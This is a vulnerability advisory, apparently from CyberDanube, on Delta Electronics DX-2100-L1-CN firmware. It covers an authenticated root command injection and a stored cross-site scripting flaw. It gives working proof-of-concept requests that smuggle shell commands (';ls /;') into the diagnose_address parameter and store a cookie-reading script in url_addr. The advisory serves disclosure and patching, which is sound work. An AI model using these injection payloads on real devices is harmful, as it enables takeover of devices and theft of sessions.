DX-2100-L1-CN / V1.5.0.10
1) Authenticated Command Injection (CVE-2022-42140)
An authenticated command injection has been identified in the web configuration service of the device. It can be used to execute system commands on the OS from the device in the context of the user „root“. Therefore, a full compromization of the device is possible by having credentials for the web service only.
2) Stored Cross-Site Scripting (CVE-2022-42141)
A stored cross-site scripting vulnerability has been identified in the function „net diagnosis“ on the device’s web configuration service. This can be exploited in the context of a victim’s session.
The parameter „diagnose_address“ contains the payload „;ls /;“, which basically prints the content of the root directory to the serial terminal of the device.
http://192.168.3.150/lform/net_diagnose?action=diagnose&diagnose_type=0&diagnose_address=;ls%20/;
The output can be seen in the context of a virtualized firmware clone, as used to find this vulnerability, but is usually invisible to a customer. Therefore, a more visible payload may be commands that interact via the network, like „;ping 192.168.0.10;“. This command will ping a device on the corresponding IP address within the local network.
The following code prints the current cached cookies of a user’s session to the screen. The JavaScript code will be stored on the device permanently.
POST /lform/urlfilter?action=save HTTP/1.1
Host: 192.168.3.150
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 190
Connection: keep-alive
Cookie: language=en_US; userindex=1; loginexpire=1648630746607; session=30
lan_ipaddr=192.168.5.5&lan_netmask=255.255.255.0&src_addr_start=&src_addr_end=&editnum=0&bfilter_urllist=0&url_addr=<script>alert(document.cookie)</script>&src_addr_type=0&filter_state=1
Update to firmware version V1.5.0.12.
CyberDanube recommends Delta Electronics customers to upgrade the firmware to the latest version available.